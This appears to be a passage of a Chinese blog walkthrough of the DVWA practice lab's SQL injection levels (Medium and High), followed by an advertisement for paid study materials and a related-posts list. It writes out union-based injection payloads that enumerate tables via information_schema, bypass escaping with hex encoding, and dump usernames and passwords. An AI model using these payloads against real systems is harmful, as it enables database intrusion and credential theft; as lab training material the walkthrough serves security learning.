DVWA靶场之SQL注入通关详解(1),网络安全开发进阶吃透这一篇必拿60W年薪

于 2024-04-05 10:26:46 发布
阅读量564 收藏 24
点赞数 16
分类专栏: 2024年程序员学习 文章标签: sql web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61068088/article/details/137395418
版权

然后回到dvwa界面,发现页面中把所有的name和Surname都列出来了。因此这里可以判断注入点的类型为数字型且不需要闭合。

接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。

接下来,再通过union select来确定回显位置。

然后使用1 union select 1,database()#语句来查询数据库。

接下来查询表名,查询语句为:1 union select 1,table_name from information_schema.tables where table_schema=database()#。如下图所示,说明数据库中有两个表guestbook和users。

获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name=‘users’)后,会发现报错了,原因是语句中含有单引号。

该等级的源码和低级的源码比较,在用户输入id这里可以看到多了一个mysqli_real_escape_string函数,该函数主要功能是:转义在SQL语句中使用的字符串中的特殊字符。

所以这里在输入查询语句时不能含有特殊的字符,那么就可以把单引号里面的内容转换成十六进制,直接以十六进制的形式写上去。如下图所示,说明表中有八个字段,即Surname所列出来的八个。

获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。结果如下图所示可以看到所有的user和对应的password。

漏洞原因:没有很好的对敏感关键字进行过滤。想要利用mysqli_real_escape_string函数进行敏感字符过滤,但是该函数并不能过滤一些敏感

的关键字,比如说:and,or这些,它只能转义一部分特殊的字符。

【High】级别

首先找页面中的注入点,这里很明显就是输入框,然后判断注入点的类型,通过输入判断语句后,可以得到这里的注入点类型是字符型。

然后接下来判断字段数,当在输入order by 3#的时候页面报错,因此这里的字段数为2。

接下来,再通过union select来确定回显位置。

下面查询数据库名称。

接下来查询表名,查询语句为:1’ union select 1,table_name from information_schema.tables where table_schema=database()#。如下图所示,说明数据库中有两个表guestbook和users。

获取表中的字段名:1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#。

获得字段中的数据(union select user,password from users),得到该数据库有五个用户。

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**

Java后时代
关注
  • 16
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA-命令注入 全级别教程
weixin_44716769的博客
09-08 5202
命令注入 实验准备 在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因,底层系统是文GBK编码所致。 在输入127.0.0.1测试时,发现如下乱码 在PHPstudy的安装目录下(每个人不同,本例)目录下,有个dvwaPage.inc.php文件,打开文件在277行修改,将UTF-8改为GBK或者GB2312即可。 重新输入命令,不再乱码 Low等级 查看源码 stristr(string,search,before_search) s
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1801
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的符合string 的字符串替换为value的值。
DVWA靶场SQL注入
剁椒鱼头没剁椒的博客
12-13 5788
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
DVWA——SQL注入
qq_62803993的博客
01-08 2423
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
墨者靶场SQL手工注入漏洞测试(MySQL数据库)通关思路
zyh1588的博客
11-01 1076
小白回顾墨者靶场sql手工注入
网络安全(渗透)DVWA靶场安装所需配置
07-10
这个是DVWA网络安全渗透靶场,这个是压缩包,此为靶场,不要看错了,学习网络安全或者是其他的渗透知识。靶场是必备的,一个好的靶场对学习知识起到了十分重要的作用,DVWA靶场网络安全或者是渗透必备的东西,...
DVWA网络安全靶场搭建与练习 附攻略和在线版
01-02
网络安全靶场搭建与练习附攻略和在线版
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
网络安全05-sql-labs靶场全网最详细总结
最新发布
m0_68976043的博客
02-10 2231
sql注入有很多方式其我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果。通过在 SQL 查询插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果,从而泄露敏感信息。基
靶场通关教程 | SQL注入篇(二)
hackzkaq的博客
11-09 71
在此案例,仍使用了LIKE语句进行模糊查询,但增加了查询条件并且使用了括号包裹,考验攻击者能否正常闭合括号,该SQL语句没有对用户输入进行任何过滤或转义,这就为注入攻击提供了机会。常见的字符串为注入点的SQL注入攻击是通过在输入的字符串插入SQL语句的特殊字符,使得这些特殊字符被误解为SQL代码的一部分,从而改变原始的SQL查询的含义。在这个示例,--表示SQL的单行注释,它会导致数据库忽略后续的查询语句,从而绕过了原本的查询过滤条件,获取了所有用户的数据。
DVWA-SQL手工注入
2302_80164634的博客
02-03 1729
查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL执行,获取对数据库的信息以及提权,发生SQL注入攻击。进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 6299
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5556
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
DVWA-SQL注入通关
yuan_boss的博客
08-23 1486
由于源码使用了mysqli_real_escape_string()函数对我们输入的数据进行转义了,所以无法使用字符型注入了,然而源码的语句恰好不是字符型注入,而是数字型注入,又因为页面回显,所以可以使用联合注入获取数据库名。users表的字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login。通过单引号,双引号依次尝试,发现单引号会引发报错,而双引号不会报错,所以是使用单引号的字符串类型。
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 5531
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
SQL注入-Pikachu靶场通关
rumil的博客
08-21 2252
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
dvwa靶场sql盲注入
06-03
DVWA是一个用于测试Web应用程序安全性的靶场,其包含了一些漏洞,比如SQL注入漏洞。下面是在DVWA靶场进行SQL盲注的一般步骤: 1. 打开DVWA靶场,选择SQL注入模块。 2. 点击“注入”按钮,进入注入页面。 3. 在注入页面找到需要注入的参数,并在参数后面加上单引号(')或双引号(")。 4. 如果页面正常显示,说明该参数没有注入漏洞;如果页面显示错误信息,说明该参数存在注入漏洞。 5. 在有注入漏洞的参数后面加上SQL注入语句(如1=1、'or 1=1--等),并观察页面输出。 6. 如果页面输出正常,说明注入语句没有被执行;如果页面输出异常,说明注入语句被执行了。 7. 利用SQL注入漏洞获取数据库信息或执行恶意操作。 需要注意的是,在实际应用,攻击者会采用更加复杂的注入技巧和工具,因此,开发者需要加强对注入漏洞的防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值